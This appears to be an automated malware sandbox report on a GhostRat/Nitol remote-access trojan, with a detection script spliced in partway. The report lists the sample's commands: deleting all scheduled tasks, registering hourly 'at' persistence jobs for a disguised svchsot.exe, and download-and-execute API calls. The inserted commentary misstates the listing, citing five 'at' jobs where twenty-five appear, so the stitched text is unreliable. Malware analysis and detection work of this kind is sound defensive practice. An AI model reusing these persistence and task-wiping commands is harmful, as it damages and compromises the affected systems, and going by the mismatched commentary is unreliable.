                      Nov 29, 2024 19:11:56.670790911 CET | 1.1.1.1 | 192.168.2.4 | 0x8f9b | Server failure (2) | www.wk1888.com | none | none | A (IP address) | IN (0x0001) | false
                      Nov 29, 2024 19:11:56.670805931 CET | 1.1.1.1 | 192.168.2.4 | 0x8f9b | Server failure (2) | www.wk1888.com | none | none | A (IP address) | IN (0x0001) | false
                      Nov 29, 2024 19:11:56.670815945 CET | 1.1.1.1 | 192.168.2.4 | 0x8f9b | Server failure (2) | www.wk1888.com | none | none | A (IP address) | IN (0x0001) | false
                      Nov 29, 2024 19:11:56.850616932 CET | 1.1.1.1 | 192.168.2.4 | 0x8be | Name error (3) | www.af0575.com | none | none | A (IP address) | IN (0x0001) | false
                      Nov 29, 2024 19:11:57.135943890 CET | 1.1.1.1 | 192.168.2.4 | 0x1c5a | Name error (3) | www.fz0575.com | none | none | A (IP address) | IN (0x0001) | false
                      Nov 29, 2024 19:12:53.397728920 CET | 1.1.1.1 | 192.168.2.4 | 0x1c98 | No error (0) | www.wk1888.com | expired.gname.net | | CNAME (Canonical name) | IN (0x0001) | false
                      Nov 29, 2024 19:12:53.397728920 CET | 1.1.1.1 | 192.168.2.4 | 0x1c98 | No error (0) | expired.gname.net | | 172.65.190.172 | A (IP address) | IN (0x0001) | false

                      Target ID:0
                      Start time:13:11:52
                      Start date:29/11/2024
                      Path:C:\Users\user\Desktop\ILQ18dgzMU.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\ILQ18dgzMU.exe"
                      Imagebase:0x400000
                      File size:187'392 bytes
                      MD5 hash:A153080F9A968B6488CF1CF2E2EA78A3
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: gh0st, Description: unknown, Source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                      • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: gh0st, Description: unknown, Source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                      • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: gh0st, Description: unknown, Source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                      Reputation:low
                      Has exited:false

                      Target ID:1
                      Start time:13:11:52
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT""
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:2
                      Start time:13:11:52
                      Start date:29/11/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:13:11:52
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:schtasks /delete /tn * /f
                      Imagebase:0x7a0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\sc.exe
                      Wow64 process (32bit):true
                      Commandline:sc config Schedule start= auto
                      Imagebase:0x910000
                      File size:61'440 bytes
                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:5
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\net.exe
                      Wow64 process (32bit):true
                      Commandline:net start "Task Scheduler"
                      Imagebase:0x3f0000
                      File size:47'104 bytes
                      MD5 hash:31890A7DE89936F922D44D677F681A7F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:6
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\net1.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\net1 start "Task Scheduler"
                      Imagebase:0xf00000
                      File size:139'776 bytes
                      MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:7
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:8
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:9
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:10
                      Start time:13:11:53
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:11
                      Start time:13:11:54
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:12
                      Start time:13:11:54
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:13
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:14
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:15
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:16
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:17
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:18
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:19
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:20
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:21
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 14:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:22
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 15:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:23
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 16:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:24
                      Start time:13:11:55
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 17:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:25
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 18:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:26
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 19:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:27
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 20:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:28
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 21:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:29
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 22:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:30
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 23:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:31
                      Start time:13:11:56
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:At 24:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Imagebase:0x650000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:32
                      Start time:13:12:02
                      Start date:29/11/2024
                      Path:C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
                      Imagebase:0x400000
                      File size:187'392 bytes
                      MD5 hash:A153080F9A968B6488CF1CF2E2EA78A3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 95%, ReversingLabs
                      Has exited:true
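The five at.exe invocations above (Targets 27-31, all spawned within the same second) are the sample's persistence: one job per hour launching the self-copy svchsot.exe (same MD5 as the submitted file) from a freshly created directory under C:\Windows. The Python below is an added detection example, not part of the Joe Sandbox report or of the sample; its event records are constructed to mirror those entries, and the field names (pid, ts, cmdline) are an assumed shape rather than a real log schema. It parses the at.exe command line and flags a scheduled binary under %SystemRoot% outside System32/SysWOW64, a filename that imitates a system binary (svchsot vs svchost), a time outside at.exe's documented 00:00-23:59 range (the 24:00 job), and a burst of jobs for one target within seconds.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed records mirroring Targets 27-31 above, plus one unrelated job for
# contrast; the field names (pid, ts, cmdline) are an assumed shape, not a real schema.
DROP_PATH = r"C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
SAMPLE_EVENTS = [{"pid": 27 + i, "ts": "13:11:56", "cmdline": f"At {20 + i}:00 {DROP_PATH}"}
                 for i in range(5)]
SAMPLE_EVENTS.append({"pid": 40, "ts": "02:00:00",
                      "cmdline": r'at 03:00 /every:M,T,W,Th,F "C:\Scripts\nightly backup.cmd"'})

# at [\\computername] HH:MM [/interactive] [/every:... | /next:...] command
AT_RE = re.compile(
    r"^\s*(?:\S*\\)?at(?:\.exe)?\s+"   # at / At / C:\...\at.exe
    r"(?:\\\\\S+\s+)?"                # optional \\computername
    r"(\d{1,2}):(\d{2})\s+"           # HH:MM
    r"((?:/\S+\s+)*)"                 # zero or more /switches
    r"(.+?)\s*$",                     # the scheduled command (may contain spaces)
    re.IGNORECASE)
SYSTEM_DIRS = {"system32", "syswow64"}
SYSTEM_NAMES = ["svchost", "lsass", "csrss", "winlogon", "services",
                "spoolsv", "explorer", "rundll32", "dllhost", "wininit"]


def parse_at(cmdline):
    """(hour, minute, [switches], command) for an at.exe job, else None."""
    m = AT_RE.match(cmdline)
    if not m:
        return None
    hour, minute, switches, command = m.groups()
    return int(hour), int(minute), switches.split(), command


def target_path(command):
    """at.exe hands the whole remainder to the scheduler, so an unquoted path
    with spaces (as in the sample) is still one path; honour quotes if present."""
    return command[1:].split('"', 1)[0] if command.startswith('"') else command


def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(basename):
    """Name of the system binary a filename imitates (edit distance 1-2), else None."""
    stem = basename.lower().rsplit(".", 1)[0]
    return next((n + ".exe" for n in SYSTEM_NAMES if 0 < levenshtein(stem, n) <= 2), None)


def inspect_event(ev):
    """Findings for one process-creation record; empty list when nothing stands out."""
    parsed = parse_at(ev["cmdline"])
    if parsed is None:
        return []
    hour, minute, _switches, command = parsed
    path = target_path(command)
    parts = [p.lower() for p in path.split("\\")]
    findings = []
    if not (0 <= hour <= 23 and 0 <= minute <= 59):
        findings.append(f"time {hour:02d}:{minute:02d} is outside at.exe's 00:00-23:59 range")
    # A binary placed under %SystemRoot% but not in the system directories
    if len(parts) >= 3 and parts[0].endswith(":") and parts[1] == "windows" \
            and parts[2] not in SYSTEM_DIRS:
        findings.append(f"scheduled binary under %SystemRoot% outside System32/SysWOW64: {path}")
    imitated = lookalike(parts[-1])
    if imitated:
        findings.append(f"{parts[-1]} resembles the system binary {imitated}")
    return findings


def find_bursts(events, min_jobs=3, window_s=120):
    """Several at.exe jobs for one target within a short window: the hourly-trigger
    persistence pattern seen in Targets 27-31. Returns {target: job_count}."""
    stamps = defaultdict(list)
    for ev in events:
        parsed = parse_at(ev["cmdline"])
        if parsed:
            stamps[target_path(parsed[3]).lower()].append(
                datetime.strptime(ev["ts"], "%H:%M:%S"))
    return {t: len(s) for t, s in stamps.items()
            if len(s) >= min_jobs and (max(s) - min(s)).total_seconds() <= window_s}


def analyze(events):
    flagged = {ev["pid"]: inspect_event(ev) for ev in events}
    return {"events": {p: f for p, f in flagged.items() if f}, "bursts": find_bursts(events)}


if __name__ == "__main__":
    report = analyze(SAMPLE_EVENTS)
    for pid, notes in report["events"].items():
        print(pid, *notes, sep="\n  ")
    print("bursts:", report["bursts"])
```

Run against process-creation telemetry (Sysmon Event ID 1 or 4688 command lines) rather than the sandbox listing; the burst rule is what separates this from a single legitimate at job, and the lookalike check deliberately ignores an exact system name so that a real svchost.exe in System32 is not flagged.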


                        Execution Graph

                        Execution Coverage:2%
                        Dynamic/Decrypted Code Coverage:55%
                        Signature Coverage:18.4%
                        Total number of Nodes:729
                        Total number of Limit Nodes:36
                        execution_graph: node/edge dump of the interactive execution graph (not readable as text). What the node labels recover: the code at 0x1000xxxx (the module the Nitol Yara rule matched) builds its install path with GetModuleFileNameA, GetWindowsDirectoryA and lstrcat, copies itself with CreateDirectoryA, CopyFileA/MoveFileA and launches the copy with WinExec; it guards against a second instance with sprintf/CreateMutexA/GetLastError followed by CloseHandle/ExitProcess, calls SetProcessWindowStation and SetErrorMode, and creates a hidden window with a message loop (RegisterClassExA, CreateWindowExA, GetMessageA/TranslateMessage/DispatchMessageA). It enumerates processes via CreateToolhelp32Snapshot, Process32First/Process32Next, OpenProcess, GetModuleFileNameExA and _strcmpi/lstrcmpiA, writes and deletes registry values via RegCreateKeyExA, RegOpenKeyExA, RegSetValueExA, RegDeleteKeyA and RegDeleteValueA, and profiles the host with GetVersionExA, gethostname, getsockname, GetSystemInfo, GlobalMemoryStatus and RegQueryValueExA/RegEnumKeyExA/RegEnumValueA reads. Its network path is WSAStartup, socket, gethostbyname, htons, connect, setsockopt, WSAIoctl, then send/recv with Sleep-based retry, torn down by setsockopt, CancelIo, InterlockedExchange, closesocket and SetEvent; worker threads are started with _beginthreadex/CreateThread and stopped with TerminateThread. The 0x401d21 region is the stub's C runtime start-up (GetVersion, HeapCreate, GetCommandLineA, GetEnvironmentStrings, GetStartupInfoA, GetModuleHandleA) feeding an in-memory PE loader (VirtualAlloc, LoadLibraryA, GetProcAddress, VirtualProtect, IsBadReadPtr), and 0x100fa534 is an unpacking routine built from VirtualAlloc, VirtualFree, VirtualProtect and ExitProcess.

                        Control-flow Graph

                        APIs
                        • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 10001A52
                        • wsprintfA.USER32 ref: 10001A8E
                          • Part of subcall function 100018A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
                          • Part of subcall function 100018A0: Process32First.KERNEL32(00000000,00000000), ref: 100018FF
                          • Part of subcall function 100018A0: GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
                          • Part of subcall function 100018A0: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
                          • Part of subcall function 100018A0: GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
                          • Part of subcall function 100018A0: _strcmpi.MSVCRT ref: 100019C8
                          • Part of subcall function 100018A0: CloseHandle.KERNEL32(00000000), ref: 100019D2
                          • Part of subcall function 100018A0: Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
                        • CreateFileA.KERNEL32(?,C0000000,00000002,00000000,00000004,00000080,00000000), ref: 10001AB6
                        • CloseHandle.KERNEL32(00000000), ref: 10001ABD
                        • Sleep.KERNEL32(000001F4), ref: 10001ACE
                        • FindFirstFileA.KERNEL32(?,?), ref: 10001AE0
                        • GetCurrentDirectoryA.KERNEL32(00000104,00000000), ref: 10001B17
                        • strstr.MSVCRT ref: 10001B2A
                        • Sleep.KERNEL32(0000EA60), ref: 10001B40
                        • GetVersionExA.KERNEL32(?), ref: 10001B55
                        • GetSystemDefaultLCID.KERNEL32 ref: 10001B5B
                        • Sleep.KERNEL32(000927C0), ref: 10001BD7
                        • Sleep.KERNEL32(000DBBA0,?,?,?), ref: 10001CA0
                        • Sleep.KERNEL32(002932E0), ref: 10001CE5
                        • GetLocalTime.KERNEL32(?), ref: 10001CEF
                        • wsprintfA.USER32 ref: 10001D33
                        • _mkdir.MSVCRT ref: 10001D3D
                        • Sleep.KERNEL32(000003E8), ref: 10001D4B
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10001DA5
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 10001DBD
                        • wsprintfA.USER32 ref: 10001DD6
                        • BeginUpdateResourceA.KERNEL32(?,00000000), ref: 10001DE5
                        • UpdateResourceA.KERNEL32(00000000,HOST,0000006C,00000000,?,00000104), ref: 10001E04
                        • EndUpdateResourceA.KERNEL32(00000000,00000000), ref: 10001E0D
                        • CloseHandle.KERNEL32(00000000), ref: 10001E14
                        • Sleep.KERNEL32(00000BB8), ref: 10001E1F
                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 10001E36
                        • Sleep.KERNEL32(0001D4C0), ref: 10001E41
                          • Part of subcall function 100127B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127B8
                          • Part of subcall function 100127B0: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127C4
                          • Part of subcall function 100127B0: Process32First.KERNEL32(00000000,00000000), ref: 100127D6
                          • Part of subcall function 100127B0: _strcmpi.MSVCRT ref: 100127E8
                          • Part of subcall function 100127B0: Process32Next.KERNEL32(00000000,00000000), ref: 100127FF
                          • Part of subcall function 100127B0: lstrcmpiA.KERNEL32(00000024,?), ref: 1001280A
                          • Part of subcall function 100127B0: Process32Next.KERNEL32(00000000,00000000), ref: 10012816
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1000211A
                        • wsprintfA.USER32 ref: 10002130
                        • wsprintfA.USER32 ref: 10002142
                        • _mkdir.MSVCRT ref: 100021E1
                        • _mkdir.MSVCRT ref: 100021EB
                        • _mkdir.MSVCRT ref: 100021F5
                        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 1000234F
                        • Sleep.KERNEL32(00001388), ref: 10002359
                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 10002376
                        • Sleep.KERNEL32(00001388), ref: 1000237D
                        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 10002395
                        • Sleep.KERNEL32(00001388,00000000,?,?,00000000,00000000), ref: 1000239F
                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 100023B6
                        • Sleep.KERNEL32(00001388), ref: 100023BD
                        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 100023D2
                        • Sleep.KERNEL32(00001388,00000000,?,?,00000000,00000000), ref: 100023DC
                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 100023F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
